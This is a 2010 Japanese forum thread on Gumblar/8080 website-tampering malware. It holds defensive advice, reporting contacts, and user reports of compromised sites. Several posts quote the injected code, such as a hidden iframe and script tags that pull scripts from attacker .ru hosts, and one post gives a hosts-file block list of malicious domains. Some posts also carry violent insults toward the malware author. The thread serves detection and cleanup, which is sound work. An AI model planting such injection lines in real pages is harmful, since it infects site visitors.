【Gumblar/GENO】Web改竄ウイルス総合10【8080】

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

＊＊＊ 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ＊＊＊
＊＊＊ 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ＊＊＊

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
http://pc11.2ch.net/test/read.cgi/sec/1274675964/

Gumblar(.x)、8080系ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2）Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1）Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2）「分類」の中の「JavaScript」を選択
(3）「Acrobat JavaScriptを使用」のチェックをクリア
(4）「OK」ボタンを押す


※サイトを運営されている方は、さらに次のことも実施していただきたい。

(1）管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2）改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する

【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
　ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
　編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意！)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります

●InternetExplorer　ツール→インターネットオプション→セキュリティ→
　　レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
　　※ActiveXもOFF
●Opera　ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari　編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir　ツール→Sleipnirのオプション→ビュー（Trident）→
　　デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape　ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
　　※SP3でIE8を使うと重くなる場合、Sleipnir＆IE8Sleipnirエディション
　　　もしくはLunascape5を使うといいようです。
●Firefox　ツール→オプション→コンテンツでJavaScript有効にするをはずす

ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。

【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・飛び先のチェック by ぴょん基地の友達
ttp://www.kakiko.com/check/sample.html

改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。

■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/


サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。

以下、代表的なサーバー管理会社

デジロック https://www.value-domain.com/webabuse.php
OCN http://www.ocn.ne.jp/info/rules/abuse/
さくら https://secure.sakura.ad.jp/notify/form/abuse.phtml
ロリポップ https://lolipop.jp/support/inq/
GMOインターネットグループ https://secure.gmo.jp/contact/
インフォシーク (isweb) http://portal.faq.rakuten.co.jp/
DION http://www.auone-net.jp/security/knowledge/navi/index.html
NTTPCコミュニケーションズ http://www.nttpc.ne.jp/
ODN https://www.odn.ne.jp/support/question/input_netabuse.html
xserver (株式会社ベット) http://www.xserver.ne.jp/faq.php
heteml ヘテムル https://secure.heteml.jp/support/inquiry/
ファーストサーバ http://www.firstserver.co.jp/contact/index.html
エキサイト http://www.excite.co.jp/help/support

改竄を受けたら

ウイルス・不正アクセス届出状況について（3月分および第1四半期）
http://www.ipa.go.jp/security/txt/2010/04outline.html
（3）ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害（ウイルス感染など）の説明
・ ウイルスのチェック方法の説明（必要に応じてオンラインスキャンサイトの紹介など）
・ 問い合わせ用窓口の連絡先

IPAに不正アクセスの届出
http://www.ipa.go.jp/security/ciadr/index.html

■ 専ブラで右クリからの検索を有効にする方法。
設定例：JaneView

設定＞基本＞機能＞コマンド欄で
コマンド名　任意の名前
実行するコマンドに　任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

>>1-8
テンプレ乙

【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
http://pc11.2ch.net/test/read.cgi/sec/1278430098/

なんでこっちじゃいかんの？

998 名前：名無しさん＠お腹いっぱい。：2010/07/21(水) 13:27:53
取扱注意
www●kakiyasuhonten●co●jp

999 名前：名無しさん＠お腹いっぱい。：2010/07/21(水) 13:52:18
store●nextbusinesssystem●com
www●kidsdrink●jp

ちょｗ柿安本店てｗ

どっか　stuxnet 取り扱ってるスレ無いかしら？
スレチ承知スマソだけど8080使いそうで怖すぎる

いちおexploit-dbに転がってるけど(コンセプトコードか実物は知らん)、
今のところは標的型だから実物は発電所勤務とかでもなきゃ手に入らないんじゃね。

22日21時に、8080の検体を収集しにいったけんど、特に変化
なし。まぁ感染するウイルスは定期的に差しかえられるので、
毎日が0デイ状態のようなもの・・・
ttp://www.virustotal.com/analisis/42c9f334b7de4a63ed92be606a650d59771fb354fa49f4399d098c24529c925d-1279803865

>>15
検体欲しぃの

ttp://internet.watch.impress.co.jp/docs/news/20100722_382380.html

コーエーテクモもGumblar感染？

別だろ。Gumblarの目的はbotnetの構築と
botnetの顧客への販売(インチキセキュソフトの販売等)だろうから。
まだZeuSとかのがありえる。

こえー

今のガンブラーってScript系だから、殆ど検出されるんじゃね？

//www.crimsontech.jp/jp/ddp/index.html

無言でURLだけ貼るなよ

//store.nextbusinesssystem.com/
あぅあぅ〜

感染サイトならドットを●に変換しろよ

>>21
pantscow●ru:8080/CD-ROM●js
凸っておきました

マスターペニス

>>17
SQLインジェクション系攻撃にやられたんじゃねーの？

うちのサイトは、アプリ更新あるごとに外部のセキュリティー企業で診断＋Webファイアウォール導入だな

カスペルスキーのGumblar-x駆除ツール
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462
を使用したところ

Spliced functions　という値が32（ほかの値は0）という結果が表示されました

何度かツールを実行したのですが　Spliced functions　の値がずっと　１　のままです。


これは既に感染していると考えてよろしいのでしょうか？

カスペスレで聞けよ

Gumblarってなんでruが多いの？

ttp://www.securelist.com/en/blog/2132/Gumblar_Farewell_Japan

本家gumblarはあちこちなんじゃね。
そもそもzlkon.lv→gumblar.cn→martuz.netだったわけだし。
これらは日本を除外している( >>31 )。
ru多めなのは8080。

martuzもcnだった。

>>31
まだ読んでないけど、実際はUSが多いのかｔｈｘ

>>32
8080型に多いのは知ってるんだけどさ
TLDがruに偏ってたのはなんでだろうなーと思って
特に理由はないのかね

そりゃRBNあたりがやってんでしょ

>>21
www●crimsontech●jp/jp/home●html
> 弊社ホームページに関するお詫びとお知らせ

対応してくれた模様、感染の公表とIPAへの報告に感謝
もうちょっと早かったら言うことなかったなあ


で、本スレどっち…

民間のセキュリティ企業がFBIのサイバー犯罪捜査に協力、スロベニアでハッカーを逮捕
http://pandajapanblogs.blogspot.com/2010/07/fbi.html

ほんと>>37のニュースみたいにGumblarの作者が逮捕されるか射殺されればいいのに…

射殺はかわいそうだろ。
感染PC全部駆除の刑。

565 名前：大人も子供も名無しさんも再び[sage] 投稿日：2010/07/30(金) 21:05:39 ID:pHxHBUIQ
ポケモンの公式ページ、
新しいポケットモンスターのこと知ってますかのページの
左上任天堂ロゴのリンク先おかしいぞ
社員見てるならさっさと直せ

497 名前：名無しさん必死だな[sage] 投稿日：2010/07/30(金) 21:18:47 0
クリックしたらパス求められるな


任天堂HPにもGumblarか？

ウェブ担当のミスじゃねーの？

Gumblar作者を頃したいと思う人は多いだろうな
本当に死ねばいいのに

ゼロデイならともかく既知の脆弱性を放置してやられる方にも問題あると思うぞ
鍵開けてたら泥棒に入られましたみたいな

泥棒より放火魔に例える方があっているな。
放火魔が出ているのに燃えやすいものを置きっぱなしにして
火事になり、近隣まで延焼で大迷惑。

>>43>>44
PC初心者でもすぐにできる対処法だけで完璧に防げるならその物言いも罷り通るんだけどな
現実は日々ゼロデイ

>>43-45
日本には「○○入れてるから大丈夫」という
セキュリティソフト依存症患者(精神疾患)が多いからなｗ

壁や屋根に穴が空いてたり、鍵や窓が壊れていても
「セコム入ってるから大丈夫(ｷﾘｯ」
(´･ω･｀)

止まらぬサイト改ざん：訪問の心あたりはありませんか〜新規告知サイト14件
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2307

Google Chrome(Win版)や、IE8+保護モード(Vista/7)で防げるのに
いまだにXP使ってたりFirefox使ってるアホが多いからこんなに感染者が増えるんだよ

Firefoxが高セキュリティーとかガセネタ流してるアホは全員死刑にすべき

Win7で、Firefox+Noscript/RequestPolicyと、Google Chrome
どっちが安全？

どんな道具を使おうと使う人間がアホなら穴だらけ。
このソフトなら安全と過信している時点でその類だよ。

そもそも100%感染防止なんてできないのに
感染防止策だけで満足しているにわかは多い。

Gumblarのみを考えた場合、感染の確率が低い方はどっち？

RequestPolicyがあれば他ドメインへの通信はしないから外部接続系には安全
アクセス自体しないんだから当たり前
Chromeはアクセスしちゃうけどなんで大丈夫なの？

しつこいぞカス

ググったらなんとなくわかったからいいや
ttp://blog.fourteenforty.jp/blog/2010/04/windows-xpgoogl.html
スレ汚し失礼

二度と来るなよ

取扱注意
www●1on1●jp
www●untiens●jp
ログにはru8080へ接続した形跡があるけど、aguseだと検出しないという…
ruドメインのjsファイルが呼び出された後に8080サイトへ行ってるみたいだが…

てす

【陥落サイトのURL悪用厳禁】
■現行型
チャイナ・テーブル　八菜香
398133●com/

当選者発表｜柿安創業138周年感謝祭
www●kakiyasuhonten●co●jp/m138th
禿に捕捉(キャッシュ)されてまつｗ

■トラップ(はぢめて見た)
【楽々茶 LALACHA】:中国茶･茶器･雑貨専門店
www●lalacha●com/
↓
＜ｉframe src=”ｈxxp:／／parkperson●ru:8080／index●php?pid=13” width=”0” height=”0” style=”display:none”＞＜／ｉframe＞

■旧型(絶賛放置中)
hnfko●web●fc2●com/yama/20080428_shishigatake/index●html
adajo●namidaame●com/

柿安 める凸完了
他は知らんｗ

柿安から返信＆該当ページの消滅を確認。
--
この度は当社サイトについてご連絡頂き誠にありがとうございました。
〜〜中略〜〜
ご連絡を受けまして確認の上速やかに削除いたしました。
重ねてお礼申し上げます。
--
との事。

Webサイトの大規模改ざんでオンラインゲームサイトが標的に
http://itpro.nikkeibp.co.jp/article/COLUMN/20100801/350884/

dansen.co.jp
これは新しい…

ttp://www.dansen.co.jp/

jsのこれ？
/*SOS*/

飛び先はNortonセーフウェブで黒判定。

って、飛び先が真っ黒なのを確認すた。>>63

>>64
× 飛び先が真っ黒なのを確認
○ 飛び先のサイトが真っ黒なのを確認

youhelpnow●ru:8080

ノーガードでこのスレに貼られたサイトよく見てるのにまだ一度もやられたことない
やられるやつって相当アホだろ

>>63
全cssの末尾に何か付いてる

>>67
どもです。
cssにも付くようになったのね。。。

>>67-68
末尾「.txt」にして送付、ひげおじさんからお返事。

> 〜.css.txt - Trojan-Downloader.JS.Agent.fnh
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

ttp://safeweb.norton.com/report/show?url=http://www.dansen.co.jp/
これマジ？

[国際110番・20スパム紹介・今月のスパム日記]
http://www.fuzita.org/spams/spamdiary.html

<html><head><script>location = 'http://xxxxxx/';</script></head></html>
↑こんな一行htmlをUPしてスパムの中継にも使われてる

>>70
＼(^o^)／オワタ

>>70
＼(^o^)／直リンクｗ

>>62
Exploit.HTML.HCP.a

>>62
オンラインゲームのパス抜きのもの
ilion.blog47.fc2.com/blog-entry-201.html
www.virustotal.com/jp/analisis/cdff7e34478a48929083674034e97fb773dcf40ccef8e70b6f6a2e56fa34c870-1281401616

>>66
ノーガードとかアホとか関係なくって、ソフトウェアの
脆弱性をふさいでるかどうか

>>61-62 消えたｗ

注入箇所削除の後告知なしで再開。
この短時間でアプリの穴を修正できるわけがない、と思ったら停止しただけでござる。

2010.08.10 2011年度向け商品開発中のため現在、
商品ページがご覧になれなくなっています。
ご迷惑をおかけしますが何卒ご了承ください。

大量の「禿.js」を装填中ｗ
www●bmisland●net/input/mailmag/detail●asp?MAGID=31&MAGCLS=274&SDFLG=1

http://2chmatomeluo.web.fc2.com/

>>78と同じやつ
www●dousoukainet●jp/plan●asp

今のところ「禿.js」を防ぐセキュリティソフトは皆無か

また凝りもせず新型を作りやがったのか
本気で作者を頃してやりたいわ
つーか本気で氏ねよ銃殺されろ
作者の国に核落とされて滅んじまえ

>>81
セキュリティソフトは関係ないよ。
現時点での話に限れば、それはIEブラウザ、かつWindows Updateを
しとらん場合に攻撃が成立しうる。

逆に8080やgumblar.xはブラウザの種類は関係ない。
アクセスしてきたブラウザに応じた攻撃コードが生成されるように
なっとる。

>>81
*/yahoo.js*
全部蹴ればええやんｗ

>>82
ニュースで窃盗事件が流れるたびにそこまで考えてたら疲れないか？
とっくに地球滅びてるよな

311 ：(�Vд�V) ◆yUyb3Tqn92 ：2010/08/13(金) 02:29:59 ID:1TXtyzUW0
けいおんのモデルの子も同窓会ネットで顔バレしてるぞ
http://www.dousoukainet.jp/plan.asp

だから言わんこっちゃない┐(�VД�V)┌

336 ：風の谷の名無しさん＠実況は実況板で：2010/08/13(金) 02:37:24 ID:LsxSDH1C0
>>311
これ前にも見たけど
けいおんのモデルになったJKって美人ではあるけどアニメには劣るよな
所詮3次元('A`)

387 ：風の谷の名無しさん＠実況は実況板で：2010/08/13(金) 02:55:26 ID:z25JrXmm0
>>311
そのページのどこにも写真ないんだけど

411 ：(�Vд�V) ◆yUyb3Tqn92 ：2010/08/13(金) 03:09:49 ID:PPZzZ1Px0
(�VД�V)部アッハッハッハはヒャ日波や八はアッハハハyはyヒャヒャヒャhyはyはy早はh！

俺様が貼ったのは最新のウィルスだよ
(<●>Д<●>)踏んだ奴ざまぁあああああああああああああああああああああああああっ！
駆除方法はメール欄参照な：(＞ｗ＜)：

416 ：(�Vд�V) ◆yUyb3Tqn92 ：2010/08/13(金) 03:17:09 ID:PPZzZ1Px0
さてウィルス(>>311)も踏ませたことだし
もう寝るお

(�Vд�V)踏んだ奴は徹夜してリカバリするかLANケーブル外しとくことだな
どちらにせよお前らがウィルス対策の作業している間、俺様はグッスリｚZZだお♪

iPhoneが乗っ取られるリスク、「Gumblar攻撃」の併用で具現化する恐れ
http://www.itmedia.co.jp/enterprise/articles/1008/12/news061.html

とうとうWinだけの問題じゃなくなってきたな

>>86
だからそういう奴がいるから
結局●とか入れても意味ねーんだよ
なので次からURL貼るときは●抜きを許可する

>>86
これはどういうウイルスですか？

>>86
これ踏んじゃったんだけどJavaScript切っていれば大丈夫？

>>86
これって禿.jsって奴？
Firefox＋NoScriptなら踏んでもOK？

>>91
おｋ

>>89
ネトゲのトロイ。

同窓会ネット　aguse、gredどちらも無反応なのだが

gumblarじゃないからじゃね

禿もガンブラーもjs切っておけば問題なし

>>95
ネトゲやってないからよく分からないけど
右上のにID、PASSを入力したらネトゲアカウント取られるってやつ？

というかさ、こんなのに感染する奴って何も設定変えてないIEでインターネットしてる初心者だけ
そんな奴らは絶対IEなんか使っちゃ駄目だろ
別にFirefox厨じゃないけどFirefox＋NoScriptでブラウジングしておきゃ感染しないんだから
初心者にはこの組み合わせを薦めるべき
入れるだけでおｋなんだから

それは言える
>>2よりも>>4こっちが最優先

>>98
2行で済むことをそんな必死に書く低脳が言っても説得力０なんだぜ

黙れ低脳

そもそもWindowsUpdateしていれば感染しない。

>>98
初心者にそんなもんすすめても
動かなくなったって言ってIEにもどるだけだろ
本人のできる範囲で対策させないと何の意味もない

ttp://www.m-sennin.com/
SBMSPAM業者でもgumblar8080判定。

http://www●dousoukainet●jp/plan●asp
ここでは異常なしって流れになってるがどっちが本当なの？

勇気がなくて踏めないURL鑑定スレin初質 Part42
http://toki.2ch.net/test/read.cgi/qa/1277970504/

あのクソ顔文字まだ捕まってねーのかよ
通報してんのになんでだ！

>>105
ここは鑑定スレじゃない

>>105
そのURLに関しては大丈夫　とだけ書いておく

>>106
器物損壊で被害届け出せば？(笑

>>106
法律に無知な奴は恥ずかしいから発言するなよ
夏厨死ね！

>>104
古いやつ･･
/AC_RunActiveContent.js
>Last-Modified: Fri, 29 Jan 2010 20:48:14 GMT

あははは調子ぶっこいてるな顔文字
いつまで続くかな

馬鹿だな
何年も前からやってて逮捕されてない有名人なんだから
法律が改正でもされん限り続くだろ

社会情勢の変化ってのはあるよ。
イカタコウィルスもそうだが、今までは手をこまねいていたものを
無理矢理何かにあてはめてタイーホというのはよくある話。
特に、その時点の署長や長官が興味を持つと、強制捜査したり
するようになる。

>>114
お前法律わかってないだろｗ
無知乙

このスレはミーハーが多いから
ちょっとしたイカタコとか例に出してるとこから見て
なにか面白いニュースがあるとすぐそれを引用したがるんだろうな
リアルで馬鹿な分ネットで知的ぶりたいだけだと思う

おっとあげちまったな
まあ過疎すれだからいいけど
あと「ちょっとした」の部分は抜いて読めよ

さっきURLがあまり晒されなくなったというか以前より少なくなったけど
減ってきてるのか？それともスレ分裂のせいか。

【陥落サイトのURL悪用厳禁】
■関東学生アメリカンフットボール連盟公式ホームページ
www●kcfa●jp/
※7月21日以前から陥落してるっぽい

■京都大学漫画研究部
kyoto-u-mk●hp●infoseek●co●jp/
※更新履歴の中に紛れ込んでる･･

【改竄】絶賛ループ中ｗ【再改竄】
darkside●higashino●jp/ms●cgi?ShowDiary_file=/lasertank/1281712375&blogid=&t=sketch
※コメント欄
>報告ありがとうございます。
>前回より被害範囲は狭まっています。
>追加対策して、根比べです。
>必ず追い出します。

クリーンインストールしろよｗｗｗ

>>119
それちょっとアホの子だなあ
根絶させるためにJPCERT/CC経由でやってもらったほうがいいかも

>※更新履歴の中に紛れ込んでる･･
ソースでは末尾なんだろうね。
それより後ろはiswebが勝手に入れる広告なので。

www●ark-web●jp/sandbox/wiki/204●html
叩くとホコリが出てきそうなWeb屋だなｗ

>>119-120
■7月12日(たぶん改竄記念日)
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1278935970
コメントにセキュリティソフト云々・・・

■7月13日
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1279023797
>『何か謎ですね』
>急に報告が来てるので、試しにウイルスバスター2010試用版を入れてみました。
>特におかしなものは検出されていません。
>written by IDK ←管理人

■8月2日(祝！再改竄)
darkside●higashino●jp/ms●cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1280752626
>『やられた』
>警告は出てないし心当たりはないしで困ってます。
>といいつつ実は心当たりあるので対策してみます。具体的内容については、攻撃者に情報を与えないため伏せておきます。
>written by IDK ←管理人

■8月13日(祝！再々改竄ｗｗ)
>>119を参照

■8月14日
Google先生に「このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。」の称号を授与されました
www.google.com/safebrowsing/diagnostic?site=darkside●higashino●jp&hl=ja


笑いすぎて腹痛えｗｗｗｗｗｗ

トレンドマイクロオンラインスキャンをしたらJaneStyleのdatが2つMal_Gumblarに感染とのこと
削除をしたらインターネットの方は軽快になったもののこれって見つけて削除をすれば問題のないウィルスですか？

そうね

>>124
専ブラなら誤検出なだけだろ

>>124が快適になったって言ってるんだからいいじゃん！！

それにしても「jsきってりゃおｋおｋ」って、
街歩くためにいちいちボディガードで周り固めればいいじゃんって言ってるようなもんだよな
java使うページも昨今増えてるのに「javaきればおｋ」って不便さを顧みない思考停止寸前モノとしか……

なんか最後の行で話が変わってるけどJava使ってるサイトそんなに増えてる？

【陥落サイトのURL悪用厳禁】
calliy●com/

関西大学なぎなた部
s1●shard●jp/kunagi
Gumblarっぽいのが混ざってるような気が･･

--本日の目玉商品--
【このサイトはコンピュータに損害を与える可能性があります。】
企業コンサルティング、ラジオ番組制作、ECサイト運営、WEB制作の株式会社エントランス。
www●en-trance●co●jp/
↓
■セーフ ブラウジング 診断結果
www.google.com/safebrowsing/diagnostic?site=www●en-trance●co●jp/&hl=ja
>疑わしいサイトとして認識されています。>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。

>>129
JAVAとJAVAScriptの違いもわからんバカはスルーしろよｗ

猛暑で頭沸騰してるのが居るなｗ
contents-edu●mind●meiji●ac●jp
>fucked by U#0h4x0r Blog:www.noahacker.com fuck jps all killer in the war !
※8080系に陥落

今gradの調子おかしくね？

間違えたgredだ

今北産業

>>130の内、残ってる分。
＞ kunagi
大学にメルポ
＞ en-trance
AC_RunActiveContent●jsに別のがあったのでWhoisからメルポ

>>130
s1●shard●jp/kunagi
　→jsunpack.jeek.org/dec/go?report=a812e039d6e8c23954264744097626222a6d00dc

>>135-136 乙乙

【陥落サイトのURL悪用厳禁】
CODE1(なつかしー)＋8080(現行型)＋一番下はガンブラコ･･なのか？
www●simpleds●biz/

>137追記
jsunpack.jeek.org/dec/go?report=bc5e43cdd9bff71b13258346a81d439ac14ae5b8

【陥落サイトのURL悪用厳禁】
新ガンブラ子なのか？
＜8080のコード＞＜!--「32桁の英数字」--＞＜script src=ｈｔｔｐ://〜中略〜.php ＞＜/script＞
↓
www●yenisehirliyiz●biz
danraf●by●ru
hiero●expo●ru ←改竄祭開催中(危)
※他にもたくさんある

■検索わーど
".ru/" ".js></script><--" "--><script src=" ".php ></script>"

■日本のサイトも陥落してるっぽい
detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1445102614

あと、コード一行だけってコレかな？
roseplaceseniorassistedliving●com

www●eudora-jp●com

</HTML>
<script type="text/javascript" src="http://riotassistance●ru/Template●js"></script>
<!--68a2c5dd53f8db2f85dd899d63a960bb-->

コンテンツはオン・ザ・エッヂ当時のままっぽいが、よくわかんない奴の手に落ちてる？

www●golf●ne●jp/guest/compe/Play_EachDisp●asp?PID=1

いちおう貼っておく
■DLLのロード方法を狙う新たな攻撃手法〜マイクロソフトがアドバイザリ公開
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2327

■マイクロソフト セキュリティ アドバイザリ (2269637)
http://www.microsoft.com/japan/technet/security/advisory/2269637.mspx

【陥落サイトのURL悪用厳禁】
www●baloghlaszlo●hu/
↓
nuttypiano●com/〜●js
どっとこむ・・

【陥落サイトのURL悪用厳禁】
関東学生アメリカンフットボール連盟公式ホームページ
kcfa●jp/ ←再改竄
>Last-Modified: Wed, 25 Aug 2010 03:26:52 GMT

nuttypiano●com/は、まだ検索に引っ掛からん･･

http://wwwyoutube●zz●tc/watchvSUUqke6rxWs

Gumblar？

>>145
ここは鑑定スレではありません

>>144
祝！＼(^o^)／再改竄

>>144
niftyにつーほー

前回もniftyにつーほーして受領されたんだけどねぇ。。。

【陥落サイトのURL悪用厳禁】
www16●atpages●jp/akimonomm/businessstory/
www●curry-ousama●co●jp/i/ ※電話用

>>145
仮想PCが重くなった　よってGumblar確定

【陥落サイトのURL悪用厳禁】
「禿.js」装填中のweb屋
・ホームページ開発,受託,請負,Web開発,システム開発【フィールドシステム】
www●fieldsystem●ne●jp/blog/entvw_0000000001●aspx
↓
＜meta name="description" CONTENT="フィールドシステムからのお知らせです。＜script src=ｈｔｔｐ:／／www●wangqiao365●com／img／yahoo●js＞＜／script＞"＞

www.google.com/safebrowsing/diagnostic?site=www●fieldsystem●ne●jp/&hl=ja
廃業しろよｗｗｗｗ

>>151
同意ｗ

>>151
これはｗ

今北産（ｒｙ

乙乙

>>149
上：＠PAGESにつーほー。
下：削除されたみたい。

>>151
So-netにつーほー。

フィールドシステム
＼(^o^)／オワタ

顔文字は「ついったー」で暴れとる？
@housoukomachi
@gyudon_sukiya
@meiji_fan

ついったーにつーほーしたら面白い事になるかもしれんｗ
※日本のザルな法律じゃなくて、アメリカンな法律で裁かれる

hostsファイルにガンブラーの感染源サイトを明記しておけばある程度防げると思うんだがなぁ
0.0.0.0 cc●wzxyq●com
って感じでゴリゴリと
C:\Windows\System32\drivers\etcフォルダ内のhostsファイルね

それとrd.or.tpはrd.or.tlにURLが変わったまま403の模様

0.0.0.0 www●rctank●jp
0.0.0.0 rctank●jp
0.0.0.0 wzxyq●com
0.0.0.0 cc●wzxyq●com
0.0.0.0 googleads●g●doubleclick●net
0.0.0.0 g●doubleclick●net
0.0.0.0 doubleclick●net
0.0.0.0 nuttypiano●com
0.0.0.0 riotassistance●ru
0.0.0.0 roseplaceseniorassistedliving●com
0.0.0.0 jsunpack●jeek●org
0.0.0.0 jeek●org
0.0.0.0 parkperson●ru
0.0.0.0 www●parkperson●ru
0.0.0.0 pantscow●ru
0.0.0.0 www●pantscow●ru
0.0.0.0 60●42●255●33
0.0.0.0 118●21●192●131
0.0.0.0 118●21●197●41
0.0.0.0 218●43●251●37
0.0.0.0 210●190●162●5
0.0.0.0 118●23●168●15
0.0.0.0 122●1●246●94
0.0.0.0 221●184●27●254
0.0.0.0 163●139●130●150
0.0.0.0 163●139●124●135
0.0.0.0 203●152●213●250
0.0.0.0 www14●atpages●jp
0.0.0.0 www●wangqiao365●com
0.0.0.0 wangqiao365●com
こんな感じで書いておけば気休めにはなるかもしれない

過去レスにもあったけどhosts明記してる人は結構いるよ

取扱注意
sumori●jp

<script type="text/javascript" src="http://youngarea●ru/Network●js"></script>
これだな

>>161
電凸完了

あんの〜〜スモリさん？
index.phpのコードは光速で消えたけど
jsの中に残ってるコードはどうすんのよ？(苦笑)

電話だけではわからないみたいだから
問い合わせフォームから再凸

■IPA(情報処理推進機構)
ttp://www.ipa.go.jp/
▼（3）ウェブサイト改ざんの被害発生時の対処
ttp://www.ipa.go.jp/security/txt/2010/04outline.html
■インシデント報告の届出(JPCERT/CC)
ttps://www.jpcert.or.jp/form/
■so-netセキュリティ通信
ttp://www.so-net.ne.jp/security/index.html
▼「ガンブラー」「サイト改ざん」めぐる基本のＱ＆Ａ
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html
